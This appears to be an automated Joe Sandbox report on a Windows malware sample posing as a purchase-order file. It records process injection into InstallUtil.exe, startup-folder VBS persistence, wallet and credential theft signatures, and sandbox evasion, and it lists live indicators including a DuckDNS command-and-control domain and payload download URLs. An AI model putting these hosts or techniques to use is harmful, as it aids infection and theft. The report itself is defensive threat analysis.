Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-12202432_ACD_Group.pif.exe

Overview

General Information

Sample name:PO-12202432_ACD_Group.pif.exe
Analysis ID:1586913
MD5:95bec6594e293a42f4abb049ea7e81db
SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64native
  • PO-12202432_ACD_Group.pif.exe (PID: 4992 cmdline: "C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
    • InstallUtil.exe (PID: 6340 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7188 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • IsNestedFamANDAssem.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe" MD5: 95BEC6594E293A42F4ABB049EA7E81DB)
      • InstallUtil.exe (PID: 6000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000004.00000002.69719834098.0000000004883000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.69506645006.0000000006590000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.IsNestedFamANDAssem.exe.4883b08.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.PO-12202432_ACD_Group.pif.exe.6590000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.PO-12202432_ACD_Group.pif.exe.3b909a0.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7188, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs" , ProcessId: 7188, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe, ProcessId: 4992, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-09T19:07:58.009916+010020355951Domain Observed Used for C2 Detected193.187.91.21850787192.168.11.2049752TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: PO-12202432_ACD_Group.pif.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeAvira: detection malicious, Label: TR/AVI.MalwareX.nhsfu
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeReversingLabs: Detection: 68%
                  Multi AV Scanner detection for submitted file
                  Source: PO-12202432_ACD_Group.pif.exeReversingLabs: Detection: 68%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: PO-12202432_ACD_Group.pif.exeJoe Sandbox ML: detected
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49753 version: TLS 1.2
                  Source: PO-12202432_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.0000000004323000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69496394260.000000000449A000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507522952.00000000066C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: Repos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: IsNestedFamANDAssem.exe, 00000004.00000002.69719834098.0000000004D18000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE318
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 4x nop then jmp 066BE693h0_2_066BE308
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E318
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E497
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4x nop then jmp 06D7E693h4_2_06D7E308

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.11.20:49752
                  Uses dynamic DNS services
                  Source: unknownDNS query: name: pureeratee.duckdns.org
                  Source: global trafficTCP traffic: 192.168.11.20:49752 -> 193.187.91.218:50787
                  Source: Joe Sandbox ViewASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-panel/uploads/Vwibbc.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: www.chirreeirl.com
                  Source: global trafficDNS traffic detected: DNS query: pureeratee.duckdns.org
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: InstallUtil.exe, 00000002.00000002.71818781121.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmS
                  Source: InstallUtil.exe, 00000002.00000002.71818781121.00000000011E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl9
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chirreeirl.com/
                  Source: PO-12202432_ACD_Group.pif.exe, IsNestedFamANDAssem.exe.0.drString found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 209.58.149.225:443 -> 192.168.11.20:49753 version: TLS 1.2

                  System Summary

                  barindex
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A1C88 NtProtectVirtualMemory,0_2_066A1C88
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A4B38 NtResumeThread,0_2_066A4B38
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A1C81 NtProtectVirtualMemory,0_2_066A1C81
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A4B30 NtResumeThread,0_2_066A4B30
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BAFEC0 NtProtectVirtualMemory,4_2_06BAFEC0
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06BAFEB8 NtProtectVirtualMemory,4_2_06BAFEB8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D631D8 NtResumeThread,4_2_06D631D8
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeCode function: 4_2_06D631D0 NtResumeThread,4_2_06D631D0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E5A0410_2_00E5A041
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E528E10_2_00E528E1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E528F00_2_00E528F0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E5A0670_2_00E5A067
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E52E690_2_00E52E69
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_00E52E780_2_00E52E78
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0583E6A00_2_0583E6A0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0583E5C50_2_0583E5C5
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0583E6850_2_0583E685
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_058330C80_2_058330C8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_058330D80_2_058330D8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0648F6280_2_0648F628
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06484C780_2_06484C78
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064870380_2_06487038
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064889AB0_2_064889AB
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0648CF080_2_0648CF08
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0648CF180_2_0648CF18
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_06484C680_2_06484C68
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064814100_2_06481410
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064814200_2_06481420
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064A3C300_2_064A3C30
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E74900_2_064E7490
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E3B0F0_2_064E3B0F
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E05B80_2_064E05B8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E05B60_2_064E05B6
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E51280_2_064E5128
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064E3E470_2_064E3E47
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065800400_2_06580040
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065874B00_2_065874B0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0658BC630_2_0658BC63
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065800060_2_06580006
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065874A00_2_065874A0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065861600_2_06586160
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065879C10_2_065879C1
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065861980_2_06586198
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_065861A80_2_065861A8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5A540_2_066A5A54
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5A930_2_066A5A93
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5A960_2_066A5A96
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5E950_2_066A5E95
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A5DF40_2_066A5DF4
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A59C80_2_066A59C8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066A59D80_2_066A59D8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066B3E580_2_066B3E58
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066B97F00_2_066B97F0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066B97DF0_2_066B97DF
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066BBC580_2_066BBC58
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066B9C250_2_066B9C25
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066BBCA80_2_066BBCA8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066BBCB80_2_066BBCB8
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_066BE4970_2_066BE497
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0698E2B00_2_0698E2B0
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_0698DF000_2_0698DF00
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_069700060_2_06970006
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_069700400_2_06970040
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeCode function: 0_2_064A3C0F0_2_064A3C0F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_011420A92_2_011420A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01141A402_2_01141A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01144B402_2_01144B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01141A302_2_01141A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01141A402_2_01141A40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01141E302_2_01141E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_01141E202_2_01141E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066104F02_2_066104F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06610DC02_2_06610DC0
